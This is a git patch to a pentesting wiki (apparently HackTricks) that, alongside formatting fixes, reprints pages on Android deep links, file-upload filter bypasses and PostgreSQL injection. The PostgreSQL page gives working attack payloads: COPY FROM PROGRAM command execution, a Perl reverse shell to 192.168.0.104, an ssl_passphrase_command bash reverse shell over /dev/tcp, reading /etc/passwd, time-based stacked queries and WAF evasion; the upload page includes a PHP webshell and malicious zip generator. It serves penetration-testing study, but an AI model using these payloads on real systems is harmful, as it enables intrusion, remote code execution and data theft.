From 8bbe3459107bc6ee526c1ee6b6a4679f639cf70d Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 2 Mar 2021 21:51:01 +0000 Subject: [PATCH] GitBook: [master] 3 pages and 2 assets modified --- ...mage (436).png => image (436) (1) (1).png} | Bin .../android-app-pentesting/README.md | 4 +- pentesting-web/file-upload/README.md | 18 +- .../postgresql-injection/README.md | 298 +++++++++--------- 4 files changed, 159 insertions(+), 161 deletions(-) rename .gitbook/assets/{image (436).png => image (436) (1) (1).png} (100%) diff --git a/.gitbook/assets/image (436).png b/.gitbook/assets/image (436) (1) (1).png similarity index 100% rename from .gitbook/assets/image (436).png rename to .gitbook/assets/image (436) (1) (1).png diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index 7aa976513..38c9d8f43 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -97,7 +97,7 @@ In this case you could try to abuse the functionality creating a web with the fo In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28436%29%20%281%29.png) +![](../../.gitbook/assets/image%20%28436%29%20%281%29%20%281%29.png) Learn how to [call deep links without using HTML pages below](./#exploiting-schemes-deep-links). @@ -455,7 +455,7 @@ _Note that you can **omit the package name** and the mobile will automatically c In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28436%29.png) +![](../../.gitbook/assets/image%20%28436%29%20%281%29.png) #### Sensitive info diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index 5c5476a03..e151423cc 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md @@ -39,7 +39,7 @@ Other useful extensions: 5. Add **another layer of extensions** to the previous check: * _file.png.jpg.php_ * _file.php%00.png%00.jpg_ -6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. ****\(useful to exploit Apache misconfigurations where anything with extension _.php_, but **not necessarily ending in .php** will execute code\): +6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. **\*\*\(useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php\*\* will execute code\): * _ex: file.php.png_ 7. Using **NTFS alternate data stream \(ADS\)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server \(e.g. “file.asax:.jpg”\). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions \(.e.g. “file.asp::$data.”\) @@ -65,7 +65,7 @@ Other useful extensions: ### Special extension tricks If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess). -If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files). +If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files). The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** \(executing it with php, or including it inside a script...\) @@ -122,7 +122,7 @@ Note that **another option** you may be thinking of to bypass this check is to m * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. -Here’s a top 10 list of things that you can achieve by uploading \(from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)\): +Here’s a top 10 list of things that you can achieve by uploading \(from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)\): 1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE 2. **SVG**: Stored XSS / SSRF / XXE @@ -139,7 +139,7 @@ Here’s a top 10 list of things that you can achieve by uploading \(from [link If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things: -### Symlink +### Symlink Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files: @@ -166,7 +166,7 @@ Some python code to create a malicious zip: #!/usr/bin/python import zipfile from cStringIO import StringIO - + def create_zip(): f = StringIO() z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) @@ -176,8 +176,8 @@ def create_zip(): zip = open('poc.zip','wb') zip.write(f.getvalue()) zip.close() - -create_zip() + +create_zip() ``` To achieve remote command execution I took the following steps: @@ -192,7 +192,7 @@ if(isset($_REQUEST['cmd'])){ }?> ``` -2. Use “file spraying” and create a compressed zip file: +1. Use “file spraying” and create a compressed zip file: ```text root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done @@ -257,5 +257,3 @@ This helps to upload a file that complins with the format of several different f More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) - - diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index 8870266fc..45e105ed4 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md @@ -1,149 +1,149 @@ -# PostgreSQL injection - -**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)\*\*\*\* - -## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration - -**`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**. -**These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**. -[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)\*\*\*\* - -### **Exfiltration example using dblink and large objects** - -You can [**read this example**](dblink-lo_import-data-exfiltration.md) ****to see a CTF example of **how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`. - -## PL/pgSQL password bruteforce - -PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language. -**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md)\*\*\*\* - -## File-system actions - -### Read directories and files - -From this [commit ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the `DEFAULT_ROLE_READ_SERVER_FILES` group and super users can use these methods on any path \(check out `convert_and_check_filename` in `genfile.c`\).: - -```sql -select * from pg_ls_dir('/tmp'); -select * from pg_read_file('/etc/passwd' , 0 , 1000000); -``` - -### Simple File Writing - -```bash -copy (select convert_from(decode('','base64'),'utf-8')) to '/just/a/path.exec'; -``` - -Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**. -A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.** - -### **Binary files upload** - -However, there are **other techniques to upload big binary files**. -[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md)\*\*\*\* - -## RCE - -### **RCE from version 9.3** - -Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg\_execute\_server\_program’ group to run arbitrary operating system commands. - -```bash -#PoC -DROP TABLE IF EXISTS cmd_exec; -CREATE TABLE cmd_exec(cmd_output text); -COPY cmd_exec FROM PROGRAM 'id'; -SELECT * FROM cmd_exec; -DROP TABLE IF EXISTS cmd_exec; - -#Reverse shell -#Notice that in order to scape a single quote you need to put 2 single quotes -COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; -``` - -Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**. -More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). - -### RCE with PostgreSQL extensions - -Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. -[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md)\*\*\*\* - -### PostgreSQL configuration file RCE - -The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.** - -![](../../../.gitbook/assets/image%20%28232%29.png) - -The configuration file have some interesting attributes that can lead to RCE: - -* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database -* `ssl_passphrase_command = ''` If the private file is protected by password \(encrypted\) postgresql will **execute the command indicated in this attribute**. -* `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**. - -Then, an attacker will need to: - -1. **Dump private key** from the server -2. **Encrypt** downloaded private key: - 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` -3. **Overwrite** -4. **Dump** the current postgresql **configuration** -5. **Overwrite** the **configuration** with the mentioned attributes configuration: - 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` - 2. `ssl_passphrase_command_supports_reload = on` -6. Execute `pg_reload_conf()` - -While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** \(so the postgres user can read it\), and is placed in _/var/lib/postgresql/12/main_. - -**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.** - -## WAF bypass - -### PostgreSQL String functions - -Manipulating strings could help you to **bypass WAFs or other restrictions**. -[**In this page** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**you can find some useful Strings functions.** - -### Stacked Queries - -Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection: - -```text -id=1; select pg_sleep(10);-- - -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- - -``` - -### XML tricks - -#### query\_to\_xml - -This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row: - -```sql -SELECT query_to_xml('select * from pg_user',true,true,''); -``` - -#### database\_to\_xml - -This function will dump the whole database in XML format in just 1 row \(be careful if the database is very big as you may DoS it or even your own client\): - -```sql -SELECT database_to_xml(true,true,''); -``` - -### Forbidden quotes - -If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses \(_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_\): - -```text -SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69); -``` - -Or with `$`. This queries return the same results: - -```text -SELECT 'hacktricks'; -SELECT $$hacktricks$$; -SELECT $TAG$hacktricks$TAG$; -``` - +# PostgreSQL injection + +**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) + +## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration + +**`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**. +**These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**. +[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md) + +### **Exfiltration example using dblink and large objects** + +You can [**read this example**](dblink-lo_import-data-exfiltration.md) **\*\*to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`. + +## PL/pgSQL password bruteforce + +PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language. +**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md) + +## File-system actions + +### Read directories and files + +From this [commit ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the `DEFAULT_ROLE_READ_SERVER_FILES` group and super users can use these methods on any path \(check out `convert_and_check_filename` in `genfile.c`\).: + +```sql +select * from pg_ls_dir('/tmp'); +select * from pg_read_file('/etc/passwd' , 0 , 1000000); +``` + +### Simple File Writing + +```bash +copy (select convert_from(decode('','base64'),'utf-8')) to '/just/a/path.exec'; +``` + +Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**. +A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.** + +### **Binary files upload** + +However, there are **other techniques to upload big binary files**. +[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md) + +## RCE + +### **RCE from version 9.3** + +Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg\_execute\_server\_program’ group to run arbitrary operating system commands. + +```bash +#PoC +DROP TABLE IF EXISTS cmd_exec; +CREATE TABLE cmd_exec(cmd_output text); +COPY cmd_exec FROM PROGRAM 'id'; +SELECT * FROM cmd_exec; +DROP TABLE IF EXISTS cmd_exec; + +#Reverse shell +#Notice that in order to scape a single quote you need to put 2 single quotes +COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; +``` + +Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**. +More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). + +### RCE with PostgreSQL extensions + +Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. +[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md) + +### PostgreSQL configuration file RCE + +The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.** + +![](../../../.gitbook/assets/image%20%28232%29.png) + +The configuration file have some interesting attributes that can lead to RCE: + +* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database +* `ssl_passphrase_command = ''` If the private file is protected by password \(encrypted\) postgresql will **execute the command indicated in this attribute**. +* `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**. + +Then, an attacker will need to: + +1. **Dump private key** from the server +2. **Encrypt** downloaded private key: + 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` +3. **Overwrite** +4. **Dump** the current postgresql **configuration** +5. **Overwrite** the **configuration** with the mentioned attributes configuration: + 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` + 2. `ssl_passphrase_command_supports_reload = on` +6. Execute `pg_reload_conf()` + +While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** \(so the postgres user can read it\), and is placed in _/var/lib/postgresql/12/main_. + +**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.** + +## WAF bypass + +### PostgreSQL String functions + +Manipulating strings could help you to **bypass WAFs or other restrictions**. +[**In this page** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**you can find some useful Strings functions.** + +### Stacked Queries + +Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection: + +```text +id=1; select pg_sleep(10);-- - +1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- - +``` + +### XML tricks + +#### query\_to\_xml + +This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row: + +```sql +SELECT query_to_xml('select * from pg_user',true,true,''); +``` + +#### database\_to\_xml + +This function will dump the whole database in XML format in just 1 row \(be careful if the database is very big as you may DoS it or even your own client\): + +```sql +SELECT database_to_xml(true,true,''); +``` + +### Forbidden quotes + +If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses \(_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_\): + +```text +SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69); +``` + +Or with `$`. This queries return the same results: + +```text +SELECT 'hacktricks'; +SELECT $$hacktricks$$; +SELECT $TAG$hacktricks$TAG$; +``` +